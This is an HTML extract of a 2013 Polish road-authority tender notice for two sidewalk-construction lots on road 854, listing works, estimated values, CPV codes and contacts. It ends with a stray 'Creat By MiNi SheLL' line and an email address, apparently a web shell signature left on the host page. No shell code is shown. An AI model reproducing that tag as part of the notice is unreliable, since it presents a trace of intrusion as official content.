<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują za pomocą faksu nr 81 886 41 03, 886 31 63, drogą elektroniczną na adres: rdw.pulawy@zdw.lublin.pl lub pocztą za zwrotnym poświadczeniem odbioru.
Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz
informacje faksem lub drogą elektroniczną, każda ze stron, na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
Osobami uprawnioną do porozumiewania się z Wykonawcami są:
1. Pan Artur Wiak - Sekcja techniczna, Tel. 81 886 31 63 - w sprawach formalno - prawnych,
2. Pan Zdzisław Minda - Sekcja techniczna, Tel. 81 886 31 63 - w sprawach technicznych.
UWAGA!
Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej Zamawiającego lub w innych sposób i zamierzają ubiegać się o udzielenie zamówienia, proszeni są o przesłanie krótkiej informacji faksem (81 886 41 03) lub pocztą elektroniczną na adres: rdw.pulawy@zdw.lublin.pl , zawierającej podstawowe dane firmy (nazwa adres nr telefonu i faksu, adres poczty elektronicznej). Wykonawcy którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez Zamawiającego indywidualnie (bezpośrednio) zawiadamiani o np. zapytaniach wyjaśnieniach i zmianach dotyczących specyfikacji istotnych warunków zamówienia zwołaniu przez Zamawiającego zebrania wszystkich Wykonawców przedłużeniu terminu składania ofert.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1: 
Budowa chodnika w ciągu drogi wojewódzkiej nr 854 Annopol - Kosin - Antoniów - Gorzyce w m. Borów na odcinku od km 12+485 do km 12+718, o długości 0,233 km.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)Zakres zadania obejmuje: 
a. Roboty pomiarowe; 
b. Roboty ziemne wraz z transportem urobku;
c. Profilowanie koryt i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni chodników i zjazdów;
d. Ustawienie obrzeży betonowych chodników i zjazdów na podsypce cementowo - piaskowej z wypełnieniem spoin zaprawą centową;
e. Wykonanie podbudowy z piasku stabilizowanego cementem Rm = 2,5 Mpa pod nawierzchnię chodnika;       
f. Wykonanie podbudowy z piasku stabilizowanego cementem Rm = 5,0 Mpa pod nawierzchnię zjazdów;      
g. Ułożenie chodników z kostki brukowej betonowej szarej Behaton gr. 6 cm na podsypce cementowo - piaskowej z wypełnieniem spoin piaskiem;
h. Ułożenie zjazdów z kostki brukowej betonowej czerwonej Behaton gr. 8 cm na podsypce cementowo - piaskowej z wypełnieniem spoin piaskiem;
i. Ułożenie na podsypce cementowo - piaskowej ścieków pochodnikowych z rur PCV grubościennych o średnicy 160 mm;
j. Plantowanie (obrobienie na czysto) powierzchni skarp;
k. Ułożenie przepustu rurowego z rur prefabrykowanych o średnicy 30 cm;
l. Przestawienie barier drogowych z rozbiórką i ponownym ustawieniem na odcinku od mostu na dł. 12 m.
Szacunkowa wartość zadania wynosi 56 681,55 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.24.52-5, 45.23.32.00-1, 45.23.32.20-7, 45.23.32.22-1, 45.23.32.92-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2:
Budowa chodnika w ciągu drogi wojewódzkiej nr 854 Annopol - Kosin - Antoniów - Gorzyce na odcinku Annopol - Opoka od km 0+945 do km 1+205, o długości 0,260 km:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadania obejmuje:
a. Roboty pomiarowe; 
b. Roboty ziemne wraz z transportem urobku; 
c. Formowanie nasypów wraz z zagęszczeniem;
d. Ustawienie na podsypce cementowo - piaskowej wystających krawężników betonowych 20 x 30 cm wraz z wykonaniem ław betonowych (B10) z oporem pod krawężniki;
e. Ustawienie na podsypce piaskowej obrzeży betonowych 30 x 8 cm z wypełnieniem spoin zaprawą cementową;
f. Wykonanie podbudowy z piasku średnioziarnistego grubości 10 cm pod nawierzchnię chodnika;
g. Ułożenie na podsypce cementowo - piaskowej (4 cm) chodników z kostki brukowej betonowej szarej Behaton gr. 6 cm;
h. Wykonanie podbudowy z kruszywa łamanego 0/31,5 mm o grubości 15 cm pod nawierzchnię zjazdów;
i. Ustawienie na zjazdach, na podsypce cementowo - piaskowej wtopionych obrzeży betonowych 30 x 8 cm wraz z wypełnieniem spoin zaprawą cementową;    
j. Ułożenie na podsypce cementowo - piaskowej na nawierzchni zjazdów z kostki brukowej czerwonej Behaton gr. 8 cm wraz z wypełnieniem spoin piaskiem;
k. Ułożenie na podsypce piaskowej ścieków z elementów betonowych 60 x 50 x 15 cm;
l. Ułożenie na podsypce cementowo - piaskowej ścieków pochodnikowych z rur PCV o średnicy 160 mm;
m. Ułożenie pod zjazdami przepustów rurowych betonowych o średnicy 40 cm wraz ze ściankami skośnymi;
n. Ręczne plantowanie (obrobienie na czysto) powierzchni skarp i dna wykopów;
o. Wykonanie poszerzenia nawierzchni jezdni o szer. ok. 0,5 m, w tym :
- roboty ziemne z transportem urobku;
- Wykonanie podbudowy z gruntu stabilizowanego cementem Rm = 2,5 Mpa o grubości 12 cm wraz z pielęgnacją piaskiem i wodą;
- Wykonanie podbudowy z kruszywa łamanego o uziarnieniu 0/31,5 mm o grubości warstwy 20 cm;
- frezowanie nawierzchni bitumicznej o grubości do 4 cm z wywozem materiału z rozbiórki na odległość do 3 km .
- Wykonanie warstwy wiążącej nawierzchni z betonu asfaltowego o uziarnieniu 0/20 o grubości warstwy 7 cm, wraz z transportem samochodami samowyładowczymi (5-10 t);
- Wykonanie warstwy ścieralnej nawierzchni z betonu asfaltowego o uziarnieniu 0/12,5 (dla KR-3), o grubości warstwy 5 cm, wraz z transportem samochodami samowyładowczymi (5-10 t).
Szacunkowa wartość zadania wynosi 146 271,82 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.24.52-5, 45.23.32.00-1, 45.23.32.20-7, 45.23.32.22-1, 45.23.32.90-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com